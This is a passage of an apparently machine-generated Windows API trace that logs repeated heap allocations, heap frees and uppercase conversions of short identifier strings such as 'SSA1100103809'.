hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0215.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0215.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0215.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0215.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0215.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0215.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0215.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0215.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0215.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0215.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7b8 [0215.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71e88 [0215.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0215.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab878 [0215.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71f88 [0215.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab878 | out: hHeap=0x2af0000) returned 1 [0215.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0215.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0215.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0215.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0215.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0215.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0215.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0215.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0215.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0215.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0215.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71db8 [0215.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0215.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0215.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ea8 [0215.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0215.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0215.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0215.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7d0 [0215.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0215.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0215.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0215.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0215.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0215.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0215.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7e8 [0215.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71de8 [0215.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0215.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0215.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71eb8 [0215.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0215.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0215.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab878 [0215.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0215.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0215.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0215.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0215.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0215.698] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0215.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0215.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0215.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab710 [0215.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0215.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0215.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ec8 [0215.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0215.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab860 [0215.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71fe8 [0215.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab800 [0215.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0215.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71fe8 [0215.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0215.698] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0215.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0215.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0215.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab800 | out: hHeap=0x2af0000) returned 1 [0215.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab860 | out: hHeap=0x2af0000) returned 1 [0215.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0215.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0215.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0215.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0215.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0215.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0215.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0215.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ec8 [0215.699] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0215.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0215.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0215.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab800 [0215.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a745e0 [0215.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ec8 [0215.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71fe8 [0215.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0215.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0215.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720d8 [0215.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0215.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0215.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72028 [0215.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0215.699] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0215.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781b0 | out: hHeap=0x2af0000) returned 1 [0215.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0215.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0215.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0215.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0215.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0215.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0215.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0215.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0215.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ec8 [0215.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71fe8 [0215.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0215.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8f0 [0215.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72028 [0215.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab908 [0215.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0215.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab908 | out: hHeap=0x2af0000) returned 1 [0215.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8f0 | out: hHeap=0x2af0000) returned 1 [0215.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0215.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0215.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0215.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a745e0 | out: hHeap=0x2af0000) returned 1 [0215.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab800 | out: hHeap=0x2af0000) returned 1 [0215.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ec8 [0215.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7160 [0215.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0215.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab908 [0215.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720d8 [0215.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab800 [0215.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0215.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab800 | out: hHeap=0x2af0000) returned 1 [0215.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab908 | out: hHeap=0x2af0000) returned 1 [0215.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0215.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7160 | out: hHeap=0x2af0000) returned 1 [0215.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0215.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0215.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0215.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0215.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0215.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0215.701] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0215.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78228 | out: hHeap=0x2af0000) returned 1 [0215.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0215.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab860 [0215.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a741f0 [0215.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0215.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ec8 [0215.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0215.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0215.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71fe8 [0215.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab830 [0215.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0215.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71fe8 [0215.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0215.702] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0215.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0215.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0215.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab830 | out: hHeap=0x2af0000) returned 1 [0215.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0215.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0215.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0215.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0215.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0215.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0215.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0215.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0215.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab800 [0215.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ec8 [0215.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0215.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0215.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0215.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab800 | out: hHeap=0x2af0000) returned 1 [0215.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0215.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0215.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0215.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0215.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0215.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ec8 [0215.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba10 [0215.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0215.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba10 | out: hHeap=0x2af0000) returned 1 [0215.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0215.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0215.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0215.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a741f0 | out: hHeap=0x2af0000) returned 1 [0215.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab860 | out: hHeap=0x2af0000) returned 1 [0215.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0215.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0215.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0215.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0215.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0215.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ec8 [0215.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f60 [0215.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f60 | out: hHeap=0x2af0000) returned 1 [0215.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0215.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0215.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0215.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0215.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0215.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0215.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab830 [0215.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ec8 [0215.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0215.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71fe8 [0215.704] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0215.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0215.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab938 [0215.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0215.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72088 [0215.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0215.704] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0215.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0215.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0215.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab860 | out: hHeap=0x2af0000) returned 1 [0215.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9b0 | out: hHeap=0x2af0000) returned 1 [0215.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0215.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0215.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0215.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0215.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0215.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0215.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab860 | out: hHeap=0x2af0000) returned 1 [0215.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0215.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0215.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0215.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0215.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0215.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0215.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0215.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0215.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0215.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0215.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 